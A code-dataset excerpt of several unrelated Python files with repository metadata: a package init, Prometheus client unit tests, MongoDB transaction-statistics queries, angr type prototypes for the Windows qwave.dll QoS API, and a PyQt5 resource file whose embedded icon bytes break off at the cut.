|
5d79c88283ebb6f37d0393451e45637a8bc6dfa1
| 181
|
py
|
Python
|
LimPy/__init__.py
|
UWPRG/LimPy
|
2a2979306ec4264de31d5ce1d2f8a59bd6eb7e9c
|
[
"BSD-2-Clause"
] | 1
|
2017-11-08T00:53:03.000Z
|
2017-11-08T00:53:03.000Z
|
LimPy/__init__.py
|
UWPRG/LimPy
|
2a2979306ec4264de31d5ce1d2f8a59bd6eb7e9c
|
[
"BSD-2-Clause"
] | null | null | null |
LimPy/__init__.py
|
UWPRG/LimPy
|
2a2979306ec4264de31d5ce1d2f8a59bd6eb7e9c
|
[
"BSD-2-Clause"
] | 2
|
2019-01-09T06:59:10.000Z
|
2019-01-18T14:58:50.000Z
|
from . import langevin_functions
from . import potential_class
from . import boundarycondition
from . import statistical_functions
from . import simulate1D
from . import simulate2D
| 25.857143
| 35
| 0.834254
| 21
| 181
| 7.047619
| 0.47619
| 0.405405
| 0.256757
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012739
| 0.132597
| 181
| 6
| 36
| 30.166667
| 0.929936
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
5d9691c7031da5f1676a875af2e4846707aafb76
| 2,796
|
py
|
Python
|
tests/unit/test_server.py
|
canonical/prometheus-k8s-operator
|
8f93ba78447b4c15e36f3f4673cb60068a099983
|
[
"Apache-2.0"
] | 2
|
2022-02-14T21:39:05.000Z
|
2022-03-30T06:57:01.000Z
|
tests/unit/test_server.py
|
canonical/prometheus-k8s-operator
|
8f93ba78447b4c15e36f3f4673cb60068a099983
|
[
"Apache-2.0"
] | 58
|
2021-12-08T10:57:09.000Z
|
2022-03-30T13:59:06.000Z
|
tests/unit/test_server.py
|
canonical/prometheus-k8s-operator
|
8f93ba78447b4c15e36f3f4673cb60068a099983
|
[
"Apache-2.0"
] | 4
|
2021-12-14T02:10:43.000Z
|
2022-03-10T13:51:07.000Z
|
# Copyright 2020 Canonical Ltd.
# See LICENSE file for licensing details.
import unittest
import responses
from prometheus_server import Prometheus
class TestServerPrefix(unittest.TestCase):
@responses.activate
def test_prometheus_server_without_route_prefix_returns_valid_data(self):
self.prometheus = Prometheus("localhost", 9090)
version = "1.0.0"
responses.add(
responses.GET,
"http://localhost:9090/api/v1/status/buildinfo",
json={
"status": "success",
"data": {"version": version},
},
status=200,
)
got_version = self.prometheus.version()
self.assertEqual(got_version, version)
@responses.activate
def test_prometheus_server_without_route_prefix_reload_configuration_success(self):
self.prometheus = Prometheus("localhost", 9090)
responses.add(
responses.POST,
"http://localhost:9090/-/reload",
status=200,
)
self.assertTrue(self.prometheus.reload_configuration())
@responses.activate
def test_prometheus_server_without_route_prefix_reload_configuration_failure(self):
self.prometheus = Prometheus("localhost", 9090)
responses.add(
responses.POST,
"http://localhost:9090/-/reload",
status=500,
)
self.assertFalse(self.prometheus.reload_configuration())
@responses.activate
def test_prometheus_server_with_route_prefix_returns_valid_data(self):
self.prometheus = Prometheus("localhost", 9090, "/foobar")
version = "1.0.0"
responses.add(
responses.GET,
"http://localhost:9090/foobar/api/v1/status/buildinfo",
json={
"status": "success",
"data": {"version": version},
},
status=200,
)
got_version = self.prometheus.version()
self.assertEqual(got_version, version)
@responses.activate
def test_prometheus_server_with_route_prefix_reload_configuration_success(self):
self.prometheus = Prometheus("localhost", 9090, "/foobar")
responses.add(
responses.POST,
"http://localhost:9090/foobar/-/reload",
status=200,
)
self.assertTrue(self.prometheus.reload_configuration())
@responses.activate
def test_prometheus_server_with_route_prefix_reload_configuration_failure(self):
self.prometheus = Prometheus("localhost", 9090, "/foobar")
responses.add(
responses.POST,
"http://localhost:9090/foobar/-/reload",
status=500,
)
self.assertFalse(self.prometheus.reload_configuration())
| 28.824742
| 87
| 0.625179
| 267
| 2,796
| 6.333333
| 0.205993
| 0.09935
| 0.070964
| 0.085157
| 0.901833
| 0.901833
| 0.901833
| 0.898285
| 0.898285
| 0.829687
| 0
| 0.038217
| 0.270029
| 2,796
| 96
| 88
| 29.125
| 0.790299
| 0.024678
| 0
| 0.714286
| 0
| 0
| 0.133627
| 0
| 0
| 0
| 0
| 0
| 0.085714
| 1
| 0.085714
| false
| 0
| 0.042857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5dcd4541e8774ac55f9cddf89ec35fed6c9d7985
| 12,693
|
py
|
Python
|
web/get_db.py
|
RightMesh/payment-channel-performance
|
3abde2d4d32353e212a49c946cb8222f297379e7
|
[
"MIT"
] | null | null | null |
web/get_db.py
|
RightMesh/payment-channel-performance
|
3abde2d4d32353e212a49c946cb8222f297379e7
|
[
"MIT"
] | 43
|
2019-01-25T23:54:27.000Z
|
2019-04-09T02:36:52.000Z
|
web/get_db.py
|
RightMesh/payment-channel-performance
|
3abde2d4d32353e212a49c946cb8222f297379e7
|
[
"MIT"
] | 1
|
2019-04-27T00:17:44.000Z
|
2019-04-27T00:17:44.000Z
|
import pymongo
from pymongo.errors import BulkWriteError
from lib.db import DB
from bson import ObjectId, Code
import json
import os
MONGO_INITDB_DATABASE = os.environ.get('MONGO_INITDB_DATABASE')
BATCH_INTERVAL = int(os.environ.get('BATCH_INTERVAL'))
class JSONEncoder(json.JSONEncoder):
def default(self, o):
if isinstance(o, ObjectId):
return str(o)
return json.JSONEncoder.default(self, o)
def get_summary_all():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
doc = col_summary.find()
results = []
for row in doc:
row = JSONEncoder().encode(row)
results.append(row)
return results
def get_summary(num):
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
doc = col_summary.find().limit(num)
results = []
for row in doc:
item = {"waiting_time":(row["waiting_time"] + row["waiting_mined_time"]), "actual_cost":row["actual_cost"], "gas_price":row["gas_price"]}
results.append(item)
return results
def get_count():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
count_total = col_summary.count()
count_details = col_summary.count({ '$and': [ {'waiting_time': {'$ne': 0}}, {'actual_cost': {'$ne': 0}} ]})
return (count_total,count_details)
def get_cost_stat():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
query = {'waiting_time': {'$ne': 0.0}, 'actual_cost': {'$ne': 0.0}}
doc = col_summary.find(query)
results = []
for row in doc:
item = {'_id': row['actual_cost'], 'value': (row['waiting_time'] + row['waiting_mined_time'])}
# row = JSONEncoder().encode(row)
results.append(item)
return results
def get_cost_avg_stat():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.actual_cost, (this.waiting_time + this.waiting_mined_time));
}
""")
reducer = Code("""
function(key, values) { return Array.avg(values) }
""")
query = {'waiting_time': {'$ne': 0.0}, 'actual_cost': {'$ne': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_cost", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_cost_median_stat():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.actual_cost, (this.waiting_time + this.waiting_mined_time));
}
""")
reducer = Code("""
function(key, values) {
values = values.sort(function(a, b){ return a - b; });
var i = values.length / 2;
return i % 1 == 0 ? (values[i - 1] + values[i]) / 2 : values[Math.floor(i)];
}
""")
query = {'waiting_time': {'$ne': 0.0}, 'actual_cost': {'$ne': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_cost", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_gas_stat():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0}}
doc = col_summary.find(query)
results = []
for row in doc:
item = {'_id': row['gas_price'], 'value': (row['waiting_time'] + row['waiting_mined_time'])}
# row = JSONEncoder().encode(row)
results.append(item)
return results
def get_gas_avg_stat():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.gas_price, (this.waiting_time + this.waiting_mined_time));
}
""")
reducer = Code("""
function(key, values) { return Array.avg(values) }
""")
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_gas", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_gas_median_stat():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.gas_price, (this.waiting_time + this.waiting_mined_time));
}
""")
reducer = Code("""
function(key, values) {
values = values.sort(function(a, b){ return a - b; });
var i = values.length / 2;
return i % 1 == 0 ? (values[i - 1] + values[i]) / 2 : values[Math.floor(i)];
}
""")
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_gas", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_avg_mined_time():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.gas_price, this.waiting_mined_time);
}
""")
reducer = Code("""
function(key, values) { return Array.avg(values) }
""")
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_gas", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_median_mined_time():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.gas_price, this.waiting_mined_time);
}
""")
reducer = Code("""
function(key, values) {
values = values.sort(function(a, b){ return a - b; });
var i = values.length / 2;
return i % 1 == 0 ? (values[i - 1] + values[i]) / 2 : values[Math.floor(i)];
}
""")
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_gas", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_waiting_mined_time():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0}}
doc = col_summary.find(query)
results = []
for row in doc:
item = {'_id': row['gas_price'], 'value': (row['waiting_mined_time'])}
# row = JSONEncoder().encode(row)
results.append(item)
return results
def get_block_avg_gas():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.blocknumber, this.gas_price);
}
""")
reducer = Code("""
function(key, values) { return Array.avg(values) }
""")
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$gt': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_gas", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_block_avg_cost():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
mapper = Code("""
function () {
emit(this.blocknumber, this.actual_cost);
}
""")
reducer = Code("""
function(key, values) { return Array.avg(values) }
""")
query = {'waiting_time': {'$ne': 0.0}, 'actual_cost': {'$gt': 0.0} }
doc = col_summary.map_reduce(mapper, reducer, "test_gas", query = query)
results = []
for row in doc.find():
# row = JSONEncoder().encode(row)
results.append(row)
return results
def get_block_and_fee():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$gt': 0.0}}
doc = col_summary.find(query)
results = []
for row in doc:
item = {'_id': row['blocknumber'], 'value': row['gas_price'], 'actual_cost': row['actual_cost'], 'txhash': row['txhash']}
results.append(item)
return results
def get_waiting_time():
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0}}
doc = col_summary.find(query)
results = []
for row in doc:
item = {'_id': row['gas_price'], 'value': (row['waiting_time'])}
results.append(item)
return results
def write_to_file(file, results):
with open(file, 'w') as outfile:
json.dump(results, outfile)
def update_summary(file):
data = []
items = []
result = 0
# Get all data
with open('data.json') as json_file:
data = json.load(json_file)
json_file.close()
for row in data:
row = json.loads(row)
item = {"txhash": row["txhash"], "blocknumber": row["blocknumber"], "blocktime": row["blocktime"], "waiting_time": row["waiting_time"], "actual_cost": row["actual_cost"], "gas_price": row["gas_price"], "waiting_mined_time": row["waiting_mined_time"]}
items.append(item)
if(len(items) > 0):
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
try:
result = col_summary.insert_many(items, ordered=False)
except BulkWriteError as bwe:
pass
# Return the number of inserted items
return result
def generate_report(file):
# Connect to mongodb
db_connection = DB()
db = db_connection.mongo_client[str(MONGO_INITDB_DATABASE)]
col_summary = db["summary"]
query = {'waiting_time': {'$ne': 0.0}, 'gas_price': {'$ne': 0.0}}
doc = col_summary.find(query)
items = []
result = 0
for row in doc:
start_time = row['blocktime'] - row['waiting_mined_time']
confirmed_time = row['blocktime'] + row['waiting_time']
item = {'txhash': row['txhash'], 'start_time': start_time, 'blocktime':row['blocktime'],'confirmed_time':confirmed_time,'gas_price':row['gas_price'],'actual_cost': row['actual_cost']}
items.append(item)
if(len(items) > 0):
col_report = db["report"]
col_report.create_index([('txhash', pymongo.ASCENDING)], unique = True)
try:
result = col_report.insert_many(items, ordered=False)
except BulkWriteError as bwe:
pass
# Close db connection
col_summary.close()
col_report.close()
return result
| 30.512019
| 258
| 0.569684
| 1,514
| 12,693
| 4.568692
| 0.087186
| 0.054937
| 0.014457
| 0.046841
| 0.830273
| 0.805407
| 0.795865
| 0.773746
| 0.763915
| 0.763915
| 0
| 0.008477
| 0.284409
| 12,693
| 416
| 259
| 30.512019
| 0.753055
| 0.060112
| 0
| 0.744108
| 0
| 0.010101
| 0.312069
| 0.033451
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06734
| false
| 0.006734
| 0.020202
| 0
| 0.16835
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
5dd5be4543a1567fd56ba85dbfff1d22eb5d5847
| 8,167
|
py
|
Python
|
angr/procedures/definitions/win32_qwave.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_qwave.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
angr/procedures/definitions/win32_qwave.py
|
r4b3rt/angr
|
c133cfd4f83ffea2a1d9e064241e9459eaabc55f
|
[
"BSD-2-Clause"
] | null | null | null |
# pylint:disable=line-too-long
import logging
from ...sim_type import SimTypeFunction, SimTypeShort, SimTypeInt, SimTypeLong, SimTypeLongLong, SimTypeDouble, SimTypeFloat, SimTypePointer, SimTypeChar, SimStruct, SimTypeFixedSizeArray, SimTypeBottom, SimUnion, SimTypeBool
from ...calling_conventions import SimCCStdcall, SimCCMicrosoftAMD64
from .. import SIM_PROCEDURES as P
from . import SimLibrary
_l = logging.getLogger(name=__name__)
lib = SimLibrary()
lib.set_default_cc('X86', SimCCStdcall)
lib.set_default_cc('AMD64', SimCCMicrosoftAMD64)
lib.set_library_names("qwave.dll")
prototypes = \
{
#
'QOSCreateHandle': SimTypeFunction([SimTypePointer(SimStruct({"MajorVersion": SimTypeShort(signed=False, label="UInt16"), "MinorVersion": SimTypeShort(signed=False, label="UInt16")}, name="QOS_VERSION", pack=False, align=None), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["Version", "QOSHandle"]),
#
'QOSCloseHandle': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle"]),
#
'QOSStartTrackingClient': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"sa_family": SimTypeShort(signed=False, label="UInt16"), "sa_data": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 14)}, name="SOCKADDR", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "DestAddr", "Flags"]),
#
'QOSStopTrackingClient': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"sa_family": SimTypeShort(signed=False, label="UInt16"), "sa_data": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 14)}, name="SOCKADDR", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "DestAddr", "Flags"]),
#
'QOSEnumerateFlows': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "Size", "Buffer"]),
#
'QOSAddSocketToFlow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimStruct({"sa_family": SimTypeShort(signed=False, label="UInt16"), "sa_data": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 14)}, name="SOCKADDR", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="QOS_TRAFFIC_TYPE"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "Socket", "DestAddr", "TrafficType", "Flags", "FlowId"]),
#
'QOSRemoveSocketFromFlow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "Socket", "FlowId", "Flags"]),
#
'QOSSetFlow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="QOS_SET_FLOW"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "FlowId", "Operation", "Size", "Buffer", "Flags", "Overlapped"]),
#
'QOSQueryFlow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="QOS_QUERY_FLOW"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "FlowId", "Operation", "Size", "Buffer", "Flags", "Overlapped"]),
#
'QOSNotifyFlow': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="QOS_NOTIFY_FLOW"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "FlowId", "Operation", "Size", "Buffer", "Flags", "Overlapped"]),
#
'QOSCancel': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimStruct({"Internal": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "InternalHigh": SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), "Anonymous": SimUnion({"Anonymous": SimStruct({"Offset": SimTypeInt(signed=False, label="UInt32"), "OffsetHigh": SimTypeInt(signed=False, label="UInt32")}, name="_Anonymous_e__Struct", pack=False, align=None), "Pointer": SimTypePointer(SimTypeBottom(label="Void"), offset=0)}, name="<anon>", label="None"), "hEvent": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)}, name="OVERLAPPED", pack=False, align=None), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["QOSHandle", "Overlapped"]),
}
lib.set_prototypes(prototypes)
| 185.613636
| 1,183
| 0.729644
| 898
| 8,167
| 6.572383
| 0.120267
| 0.173501
| 0.116571
| 0.167401
| 0.852084
| 0.840054
| 0.824975
| 0.824975
| 0.817181
| 0.807523
| 0
| 0.018649
| 0.080813
| 8,167
| 43
| 1,184
| 189.930233
| 0.76755
| 0.003428
| 0
| 0
| 0
| 0
| 0.20037
| 0.008133
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.2
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
53dc7caad9a8c39f1bbac704a4770880f0db73d1
| 30,471
|
py
|
Python
|
res_rc.py
|
lsldragon/AITranslator
|
70c3dbec40e6aaf250830550ab53fe93d894bae5
|
[
"MIT"
] | null | null | null |
res_rc.py
|
lsldragon/AITranslator
|
70c3dbec40e6aaf250830550ab53fe93d894bae5
|
[
"MIT"
] | null | null | null |
res_rc.py
|
lsldragon/AITranslator
|
70c3dbec40e6aaf250830550ab53fe93d894bae5
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt5 (Qt v5.15.0)
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore
qt_resource_data = b"\
\x00\x00\x04\x7e\
\x00\
\x00\x01\x00\x01\x00\x10\x10\x00\x00\x01\x00\x20\x00\x68\x04\x00\
\x00\x16\x00\x00\x00\x28\x00\x00\x00\x10\x00\x00\x00\x20\x00\x00\
\x00\x01\x00\x20\x00\x00\x00\x00\x00\x30\x04\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\x33\xc5\
\x6a\xc9\x32\xc6\xc5\xc9\x32\xc6\xf5\xca\x32\xc5\xb1\xbf\x40\xbf\
\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\xc7\x34\xc7\x40\xc8\x31\xc6\xc4\xc9\x32\xc6\xe1\xca\x32\xc7\
\x60\xc9\x31\xc5\x9b\xc9\x32\xc6\xff\xc9\x32\xc6\xff\xc9\x33\xc6\
\xa1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\x00\x00\x00\x00\xcc\x33\xcc\x0a\xcc\x33\xc6\
\x28\xc9\x31\xc7\x68\xc9\x32\xc6\xcc\xc9\x32\xc6\xff\xc9\x32\xc6\
\xff\xc9\x32\xc7\x7f\xca\x32\xc6\x99\xc9\x32\xc6\xff\xc9\x32\xc6\
\xff\xc8\x31\xc5\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\xc6\x39\xc6\x12\xca\x32\xc6\xcd\xc9\x32\xc6\
\xff\xc9\x33\xc6\xe3\xca\x33\xc7\x69\xca\x31\xc6\x81\xc9\x32\xc6\
\xff\xc9\x32\xc6\xff\xc9\x31\xc5\x77\xc9\x32\xc6\xfb\xc9\x32\xc6\
\xff\xc9\x32\xc6\xda\xbf\x40\xbf\x04\x00\x00\x00\x00\x00\x00\x00\
\x00\xff\x00\xff\x02\xca\x32\xc6\xcd\xc9\x32\xc6\xff\xc9\x32\xc6\
\xff\xc9\x32\xc6\xff\xc9\x32\xc6\xff\xc9\x33\xc6\x9c\xc9\x32\xc7\
\xd0\xc9\x32\xc6\xff\xc9\x32\xc6\xff\xc9\x32\xc6\xff\xc9\x32\xc6\
\xfe\xc9\x32\xc6\xce\xc9\x31\xc5\x39\x00\x00\x00\x00\x00\x00\x00\
\x00\xff\x00\xff\x01\xc9\x31\xc3\x2f\xca\x32\xc7\x5b\xc8\x32\xc7\
\x9a\xc9\x32\xc6\xf3\xc9\x32\xc6\xff\xc9\x32\xc6\xff\xc9\x32\xc6\
\xff\xc9\x32\xc6\xff\xc9\x32\xc6\xfd\xc9\x32\xc6\x93\xc8\x34\xc8\
\x45\xca\x31\xc6\x81\xc9\x32\xc7\x7f\x00\x00\x00\x00\x00\x00\x00\
\x00\x00\x00\x00\x00\xcc\x33\xcc\x05\xca\x31\xc5\x3e\xc8\x37\xc8\
\x17\xc5\x2e\xc5\x16\xc8\x32\xc6\xad\xc9\x32\xc6\xff\xc9\x32\xc6\
\xfa\xc8\x32\xc7\xa3\xc8\x34\xc4\x4a\xc9\x31\xc6\xa0\xc9\x32\xc6\
